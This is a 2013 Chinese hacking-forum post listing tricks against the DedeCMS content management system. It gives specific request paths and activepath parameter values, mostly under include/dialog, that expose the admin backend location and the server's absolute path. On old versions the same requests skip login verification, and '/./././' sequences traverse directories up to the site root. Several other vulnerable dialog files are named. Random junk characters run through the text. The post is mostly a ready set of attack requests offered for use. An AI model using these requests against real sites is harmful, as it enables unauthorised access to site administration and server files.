中国网络渗透测试联盟

标题: dedecms爆后台文件技巧 [打印本页]
作者: admin    时间: 2013-4-16 16:50
标题: dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理: Z6 u" F" _9 s
+ M9 y2 \  y/ n& |  p: q2 R. n
员帐号,新版本的就直接转向了后台.9 V5 ?- o! ?- W( F6 W3 @
: {# F+ G0 E; S  k* V6 w! X# L
2.include/dialog/config.php会爆出后台管理路径
  @) l' E1 }, `1 v. U
" C0 V( g; q7 W) F$ y- T3 I3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录. I  I' b8 n7 v2 f; [

; Z, k7 N- ?7 f5 k7 `. ]4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
, }+ P. G; ?+ S! G3 ]
/ @( H1 M; ?* d4 b1 Q/ d5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
" b" i" F6 N; N# J( p! e0 M+ F
6 L/ |# [) Z! l/ o到根目录去.不过这些版本的访问地址有些不同.* l! p9 H  U, ?4 j: Q3 R! ?
地址为require/dialog/select_soft.php?activepath=/././././././././. R( y& y+ \; G# T
5 H2 a" o; R' j  \  ^
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..$ M7 p$ F! b9 b/ y" x
存在相同问题的文件还有. x8 _2 a; N9 p( l' S
include\dialog\select_images.php
$ c0 J( T% B; t* A& Uinclude\dialog\select_media.php
& w5 X; r; g" J7 e8 ?include\dialog\select_templets.php​
) s  i+ V4 l) H0 q6 Z



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2